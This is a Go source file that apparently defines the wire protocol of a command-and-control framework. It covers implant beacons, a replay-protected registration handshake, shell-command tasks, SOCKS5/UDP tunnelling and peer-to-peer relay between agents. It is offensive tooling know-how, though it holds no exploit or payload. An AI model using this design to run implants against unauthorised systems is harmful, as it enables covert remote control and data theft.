package protocol

// CurrentProtocolVersion is the supported protocol version.
// Increment when making breaking changes to the wire format.
const CurrentProtocolVersion uint = 2

// MinSupportedProtocolVersion is the oldest protocol version the server
// will accept. Agents below this threshold are rejected immediately.
const MinSupportedProtocolVersion uint = 2

// Protocol v2 (breaking change over v1):
//   - envelopes carry a monotonic per-agent sequence number (seq) and a
//     Unix timestamp (ts); the server enforces a sliding replay window and
//     persists last_seq per implant.
//   - the shared beacon key is no longer transmitted on the wire. It is only
//     used to derive a per-agent registration key (HKDF) that authenticates
//     the one-time registration handshake which binds the agent identity
//     public key (id_pub).
//   - after registration, session keys are derived from X25519 key agreement
//     using the agent identity key, so the server can re-establish a session
//     from the persisted identity public key after a restart.

// BeaconRequest is sent by agent to server on each check-in.
type BeaconRequest struct {
	UUID            string            `json:"uuid"`
	ProtocolVersion uint              `json:"pv,omitempty"`
	AgentVersion    string            `json:"av,omitempty"`
	Seq             uint64            `json:"seq,omitempty"`
	Ts              int64             `json:"ts,omitempty"`
	Info            map[string]string `json:"info,omitempty"`
	Results         []TaskResult      `json:"results,omitempty"`
	ResultIDs       []string          `json:"result_ids,omitempty"`
	AckTaskIDs      []uint            `json:"acks,omitempty"`
	TaskCapacity    *int              `json:"task_capacity,omitempty"`
	SocksData       []SocksFrame      `json:"socks_data,omitempty"`
	Relayed         []RelayedData     `json:"relayed,omitempty"`

	ECDHPub   string `json:"ecdh_pub,omitempty"`
	CipherB64 string `json:"c,omitempty"`

	// Registration handshake (one-time, authenticated by reg_hmac).
	IdentityPub string `json:"id_pub,omitempty"`
	RegHMAC     string `json:"reg_hmac,omitempty"`
}

// RelayedData carries child agent results forwarded by parent (P2P).
type RelayedData struct {
	AgentID    string       `json:"agent_id"`
	Results    []TaskResult `json:"results"`
	AckTaskIDs []uint       `json:"acks,omitempty"`
}

// TaskResult is the result output from a completed agent task.
type TaskResult struct {
	TaskID   uint   `json:"task_id"`
	Type     string `json:"type"`
	Output   string `json:"output"`
	Error    string `json:"error,omitempty"`
	Encoding string `json:"encoding,omitempty"`
	Filename string `json:"filename,omitempty"`
	Size     int64  `json:"size,omitempty"`
	Offset   int64  `json:"offset,omitempty"`
	Path     string `json:"path,omitempty"`
	// ResultID is a per-result unique id generated by the agent, used for
	// idempotency auditing of replayed or duplicated results.
	ResultID string `json:"rid,omitempty"`
}

// BeaconResponse is sent by server to agent in reply to a check-in.
type BeaconResponse struct {
	Tasks           []Task        `json:"tasks"`
	ProtocolVersion uint          `json:"pv,omitempty"`
	Seq             uint64        `json:"seq,omitempty"`
	RegOK           bool          `json:"reg_ok,omitempty"`
	Rekey           bool          `json:"rekey,omitempty"`
	SocksFrames     []SocksFrame  `json:"socks_frames,omitempty"`
	SocksFastMode   bool          `json:"socks_fast,omitempty"`
	Relayed         []RelayedTask `json:"relayed,omitempty"`
	ExtC2Data       []string      `json:"extc2_data,omitempty"`

	ECDHPub   string `json:"ecdh_pub,omitempty"`
	CipherB64 string `json:"c,omitempty"`
}

// RelayedTask carries tasks destined for child agents (P2P).
type RelayedTask struct {
	AgentID string `json:"agent_id"`
	Tasks   []Task `json:"tasks"`
}

// Task is a command or operation dispatched to an agent.
type Task struct {
	ID        uint   `json:"id"`
	Type      string `json:"type"`
	Command   string `json:"command"`
	Encrypted bool   `json:"enc,omitempty"`
	Shell     string `json:"shell"`
	Path      string `json:"path,omitempty"`
	Data      string `json:"data,omitempty"`
	Offset    int64  `json:"offset,omitempty"`
	Size      int64  `json:"size,omitempty"`
}

// SocksFrame carries SOCKS5 proxy relay data between agent and server.
type SocksFrame struct {
	ConnID uint64 `json:"conn_id"`
	Action string `json:"action"`
	Data   []byte `json:"data,omitempty"`
}

// UDPAssociateFrame describes a single UDP datagram relayed through the SOCKS
// tunnel. The server parses the SOCKS5 UDP request header from the operator,
// extracts (DstAddr, DstPort, Data), and forwards them to the agent via this
// struct (binary-encoded inside SocksFrame.Data). The agent sends back the
// response payload with the original destination address so the server can
// re-wrap the SOCKS5 UDP header.
type UDPAssociateFrame struct {
	ConnID  uint64 `json:"conn_id"`
	Data    []byte `json:"data,omitempty"`
	DstAddr string `json:"dst_addr,omitempty"`
	DstPort int    `json:"dst_port,omitempty"`
}
